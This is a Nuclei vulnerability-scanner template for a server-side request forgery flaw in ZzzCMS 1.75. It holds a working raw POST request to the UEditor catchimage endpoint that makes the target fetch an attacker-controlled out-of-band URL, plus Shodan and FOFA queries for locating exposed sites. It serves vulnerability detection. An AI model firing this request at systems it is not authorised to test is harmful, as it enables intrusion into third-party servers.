id: zzzcms-ssrf

info:
  name: ZzzCMS 1.75 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: ZzzCMS (A Lightweight ASP.NET content management system) is vulnerable to SSRF(Server-Side Request Forgery).
  reference:
    - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"ZzzCMS"
    fofa-query: title="ZzzCMS"
    product: zzzcms
    vendor: zzzcms
  tags: zzzcms,ssrf,oast
  classification:
    cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:*
variables:
  filename: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source[0]=http://{{interactsh-url}}/{{filename}}.txt

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - '{"state":'
          - 'list":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220339262dc59b62cb3b19303288bfc967cdda661cd394c67e7bb57ba997007cc9f022006e52d3e51f444f1c203c2d37c8ef2338c87e559a1a995e15d484b232de7935a:922c64590222798bb761d5b6d8e72950